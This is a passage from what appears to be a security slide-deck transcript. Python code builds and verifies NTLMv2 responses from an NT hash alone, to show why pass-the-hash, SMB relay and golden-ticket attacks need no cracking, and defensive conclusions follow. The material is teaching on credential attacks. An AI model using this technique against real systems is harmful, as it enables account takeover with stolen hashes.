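def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, timestamp: int, target_info: bytes) -> bytes:
    """NTLMv2 response (MS-NLMP 3.3.2). The only secret that goes in is the NT hash,
    which is why pass-the-hash works: nobody on either side needs the password."""
    ntowfv2 = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    nt_proof = hmac.new(ntowfv2, server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


def verify_ntlmv2(nt: bytes, user: str, domain: str, server_challenge: bytes,
                  response: bytes) -> bool:
    """What the server (or DC) does with the stored hash: recompute and compare the proof."""
    ntowfv2 = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    expected = hmac.new(ntowfv2, server_challenge + response[16:], hashlib.md5).digest()
    return hmac.compare_digest(expected, response[:16])


if __name__ == "__main__":
    # Constructed values: a user whose hash was dumped, and a challenge the server sent.
    stolen = nt_hash("password")
    print("NT hash:", stolen.hex())   # 8846f7eaee8fb117ad06bdd830b7586c
    server_chal = bytes.fromhex("0123456789abcdef")
    client_chal = bytes.fromhex("fedcba9876543210")
    resp = ntlmv2_response(stolen, "alice", "ACME", server_chal, client_chal, 0, b"")
    print("accepted with hash only:", verify_ntlmv2(stolen, "alice", "ACME", server_chal, resp))
```

The same property applies to NetNTLMv1 and to Kerberos RC4 pre-authentication, which is why slide 85's list (SMB relay, pass-the-hash, golden tickets) works without ever cracking anything; cracking only matters when the attacker needs the cleartext for a system that will not take the hash.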
  • 86. CONCLUSIONS
    • Protecting passwords is really, really hard if an attacker has admin rights to your system
    • Don't store passwords in cleartext – anywhere!
    • Only use encryption when the cleartext password needs to be used later
    • Use an HSM to protect the keys used to encrypt data
    • Use strong salted hashes to protect passwords
    • Enforce least privilege everywhere – networks, servers, applications…EVERYWHERE
  • 87. NETSPI REFERENCES • NetSPI blog: http://www.netspi.com/blog • NetSPI github: https://github.com/netspi • Scott github: https://github.com/nullbind • NetSPI slideshare: http://slideshare.com/netspi • Scott slideshare: http://slideshare.com/nullbind • Scott twitter: @_nullbind
